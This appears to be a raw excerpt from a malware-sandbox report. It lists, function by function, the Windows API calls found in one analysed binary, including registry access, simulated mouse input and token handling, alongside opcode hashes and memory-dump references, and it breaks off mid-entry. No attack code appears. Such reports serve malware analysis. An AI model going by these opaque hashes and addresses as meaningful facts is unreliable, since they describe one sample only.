                                                                    • Opcode ID: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
                                                                    • Instruction ID: 4507df60307cc4cb2243188bbcaba65c58b792ba0b81bf569a33c579ddce4e73
                                                                    • Opcode Fuzzy Hash: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
                                                                    • Instruction Fuzzy Hash: 6E11B2B2110219BFEF159F65CC85EEBBF6EFF0C798F014115BA44A6050CA72AC21DBA4
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00FF9AE6
                                                                      • Part of subcall function 00FF3187: EncodePointer.KERNEL32(00000000), ref: 00FF318A
                                                                      • Part of subcall function 00FF3187: __initp_misc_winsig.LIBCMT ref: 00FF31A5
                                                                      • Part of subcall function 00FF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FF9EA0
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FF9EB4
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FF9EC7
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FF9EDA
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FF9EED
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FF9F00
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FF9F13
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FF9F26
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FF9F39
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FF9F4C
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FF9F5F
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FF9F72
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FF9F85
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FF9F98
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FF9FAB
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FF9FBE
                                                                    • __mtinitlocks.LIBCMT ref: 00FF9AEB
                                                                    • __mtterm.LIBCMT ref: 00FF9AF4
                                                                      • Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C56
                                                                      • Part of subcall function 00FF9B5C: _free.LIBCMT ref: 00FF9C5D
                                                                      • Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(0108EC00,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C7F
                                                                    • __calloc_crt.LIBCMT ref: 00FF9B19
                                                                    • __initptd.LIBCMT ref: 00FF9B3B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FF9B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 3567560977-0
                                                                    • Opcode ID: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
                                                                    • Instruction ID: 25353f68e2b6fabdb854dc9a01f9151ce7cbcc4dceaaef9f73d3f138de7eb396
                                                                    • Opcode Fuzzy Hash: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
                                                                    • Instruction Fuzzy Hash: 33F0CD3291D7191AE7347674BC07B7E36809F42B74B200A19F7A0960FAEEE9850162A4
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FF3F85), ref: 00FF4085
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00FF408C
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00FF4097
                                                                    • DecodePointer.KERNEL32(00FF3F85), ref: 00FF40B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 3489934621-2819208100
                                                                    • Opcode ID: eb97210d8e4938d44e7333ed7fddd8339fc81d6447683d3d3b4b8410812aa2b2
                                                                    • Instruction ID: 0c62b58193295dd3e4870ae426df2610c78ea4855c951e4c734bc4ace63f8a0e
                                                                    • Opcode Fuzzy Hash: eb97210d8e4938d44e7333ed7fddd8339fc81d6447683d3d3b4b8410812aa2b2
                                                                    • Instruction Fuzzy Hash: BCE09AB0541301ABEB30AF71E919B173AB4BB14782F104418F5C6D90A8CF7F5500DF14
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 3253778849-0
                                                                    • Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                    • Instruction ID: 021f3a83fcda1854beca9f113fdf23e7ed7353730697c4c0325bdf044d11d5a5
                                                                    • Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                    • Instruction Fuzzy Hash: 5861063090424AABCF01FF64CC81EFE3BA9AF49308F484459FD955B2A2DB79D905EB50
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010502BD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010502FD
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01050320
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01050349
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0105038C
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01050399
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                    • String ID:
                                                                    • API String ID: 4046560759-0
                                                                    • Opcode ID: 7c40ddb1752fd917dede42789465e34eb5f53d70be2ab0de9a9f9a73d09bde27
                                                                    • Instruction ID: eb80c3a3717e61336409ea83aa81a3651adbb3409002298ee4fda9542ce07c1b
                                                                    • Opcode Fuzzy Hash: 7c40ddb1752fd917dede42789465e34eb5f53d70be2ab0de9a9f9a73d09bde27
                                                                    • Instruction Fuzzy Hash: 5E512631208305AFD750EF68C885EAFBBE9EF84314F04491DF9858B2A2DB75E905DB52
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 010557FB
                                                                    • GetMenuItemCount.USER32(00000000), ref: 01055832
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0105585A
                                                                    • GetMenuItemID.USER32(?,?), ref: 010558C9
                                                                    • GetSubMenu.USER32(?,?), ref: 010558D7
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 01055928
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: 151c290fa844ab471bc9c8fc217fc236451baabfacf9e9e81f6785b7b6b327a1
                                                                    • Instruction ID: 954bd4a348b650911d57c7e156534d667f705db43be94fb29e381de4f4ad8d8f
                                                                    • Opcode Fuzzy Hash: 151c290fa844ab471bc9c8fc217fc236451baabfacf9e9e81f6785b7b6b327a1
                                                                    • Instruction Fuzzy Hash: 3F516C31E00216AFCF51EFA4CC459AEBBB5EF48720F144099ED81BB351CB79AE419B90
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0102EF06
                                                                    • VariantClear.OLEAUT32(00000013), ref: 0102EF78
                                                                    • VariantClear.OLEAUT32(00000000), ref: 0102EFD3
                                                                    • _memmove.LIBCMT ref: 0102EFFD
                                                                    • VariantClear.OLEAUT32(?), ref: 0102F04A
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0102F078
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                    • String ID:
                                                                    • API String ID: 1101466143-0
                                                                    • Opcode ID: 258dc570bcb8bef85626c037a29aab94d66a518a7b23d8418bf203357d0d6a5c
                                                                    • Instruction ID: 9511ba63c1ed898f958e1c443bccfd0b80c1305325ab20a956ba7707fa365e90
                                                                    • Opcode Fuzzy Hash: 258dc570bcb8bef85626c037a29aab94d66a518a7b23d8418bf203357d0d6a5c
                                                                    • Instruction Fuzzy Hash: 15515C75A0021A9FDB10DF58C884AAABBF8FF4C350B158559FA89DB305E735E911CF90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032258
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010322A3
                                                                    • IsMenu.USER32(00000000), ref: 010322C3
                                                                    • CreatePopupMenu.USER32 ref: 010322F7
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 01032355
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01032386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: 55de95a3a0a0f294679f3f79a1a06c1de413f1a2315d258803570a908b0c38f8
                                                                    • Instruction ID: ee6aedba4539353d9e1966b4fcc5fdfd2f0671a4e15b001f05aa83a779feb817
                                                                    • Opcode Fuzzy Hash: 55de95a3a0a0f294679f3f79a1a06c1de413f1a2315d258803570a908b0c38f8
                                                                    • Instruction Fuzzy Hash: FD519F7060130AEBDF21CF68D888BAEBBF9BF85318F108199E99597290D7719944CB51
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FD179A
                                                                    • GetWindowRect.USER32(?,?), ref: 00FD17FE
                                                                    • ScreenToClient.USER32(?,?), ref: 00FD181B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FD182C
                                                                    • EndPaint.USER32(?,?), ref: 00FD1876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 1827037458-0
                                                                    • Opcode ID: 50fc7b49a8501d1103f736f67bd9f559552a15af3e8a94c03896d78bda552012
                                                                    • Instruction ID: 863399f2bc95f2fe84656e866fd6a7cebe5417697129b9f3f5a8a52edbb053e1
                                                                    • Opcode Fuzzy Hash: 50fc7b49a8501d1103f736f67bd9f559552a15af3e8a94c03896d78bda552012
                                                                    • Instruction Fuzzy Hash: B241B131504301AFD722DF25CC84BAB7BE9FB4A724F18066AF5948B2A1C7359905EB61
                                                                    APIs
                                                                    • ShowWindow.USER32(010957B0,00000000,01516A70,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B712
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0105B736
                                                                    • ShowWindow.USER32(010957B0,00000000,01516A70,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B796
                                                                    • ShowWindow.USER32(00000000,00000004,?,0105B5A8,?,?), ref: 0105B7A8
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0105B7CC
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0105B7EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 95319d3a8c2a123f2f8a99614031e3643f970da2fac528c0048bbe8a9b5b3b93
                                                                    • Instruction ID: 0ef0c6a6c479215e38076f4de151c356393065ccd895d74ded93176202dc8dad
                                                                    • Opcode Fuzzy Hash: 95319d3a8c2a123f2f8a99614031e3643f970da2fac528c0048bbe8a9b5b3b93
                                                                    • Instruction Fuzzy Hash: 48412134500249AFDBA6CF28C499B967FE2FF05310F1C41E5EE888F562C735A455DB51
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,01044E41,?,?,00000000,00000001), ref: 010470AC
                                                                      • Part of subcall function 010439A0: GetWindowRect.USER32(?,?), ref: 010439B3
                                                                    • GetDesktopWindow.USER32 ref: 010470D6
                                                                    • GetWindowRect.USER32(00000000), ref: 010470DD
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0104710F
                                                                      • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
                                                                    • GetCursorPos.USER32(?), ref: 0104713B
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01047199
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: 6aab1842f6860d021f7a6669a244a103a42c686ec404b5e98177e0ef21a4790f
                                                                    • Instruction ID: 4eab2b4616e2948ddf4989d858d2e7f6ef7eb3f2cf365759a7d766cbea88c929
                                                                    • Opcode Fuzzy Hash: 6aab1842f6860d021f7a6669a244a103a42c686ec404b5e98177e0ef21a4790f
                                                                    • Instruction Fuzzy Hash: 0C31A472505306ABD720DF18D848F9BBBEAFF89314F000929F5C5A7191D775EA09CB92
                                                                    APIs
                                                                      • Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
                                                                      • Part of subcall function 010280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
                                                                      • Part of subcall function 010280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
                                                                      • Part of subcall function 010280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
                                                                      • Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6
                                                                    • GetLengthSid.ADVAPI32(?,00000000,0102842F), ref: 010288CA
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010288D6
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 010288DD
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 010288F6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,0102842F), ref: 0102890A
                                                                    • HeapFree.KERNEL32(00000000), ref: 01028911
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 616d0a0256ba8ceeb59d8b3a6df092478997706a7169e1de0b52b850035bc335
                                                                    • Instruction ID: 7ca0b49190bded980b8d7d5c6ee24dea9729bc9aa07bae4f85e8c2fa902220f6
                                                                    • Opcode Fuzzy Hash: 616d0a0256ba8ceeb59d8b3a6df092478997706a7169e1de0b52b850035bc335
                                                                    • Instruction Fuzzy Hash: CC11AF3560121AFFEB649FA8DC09BBF7BE8EB45315F18805AE9C597100C73A9900CB60
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010285E2
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 010285E9
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 010285F8
                                                                    • CloseHandle.KERNEL32(00000004), ref: 01028603
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01028632
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 01028646
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
                                                                    • Instruction ID: 560523f4970b63cc20d351cfae10734b79fecb82bcb6c4fd956592ab19bb82c4
                                                                    • Opcode Fuzzy Hash: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
                                                                    • Instruction Fuzzy Hash: 971159B650121EABEF218EA8DD49BDF7BE9EF08344F048055FE44A2160C37A9D60DB60
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0102B7B5
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0102B7C6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0102B7CD
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0102B7D5
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0102B7EC
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0102B7FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
                                                                    • Instruction ID: 9bf7313f247807a8f7304e571bd484b84e98af68862d1c75b33c178889d073ea
                                                                    • Opcode Fuzzy Hash: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
                                                                    • Instruction Fuzzy Hash: 65018475E00319BBEB109BB69C45A5FBFB8EB48351F044065FA44A7281D6359800CFA0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1
                                                                    Memory Dump Source
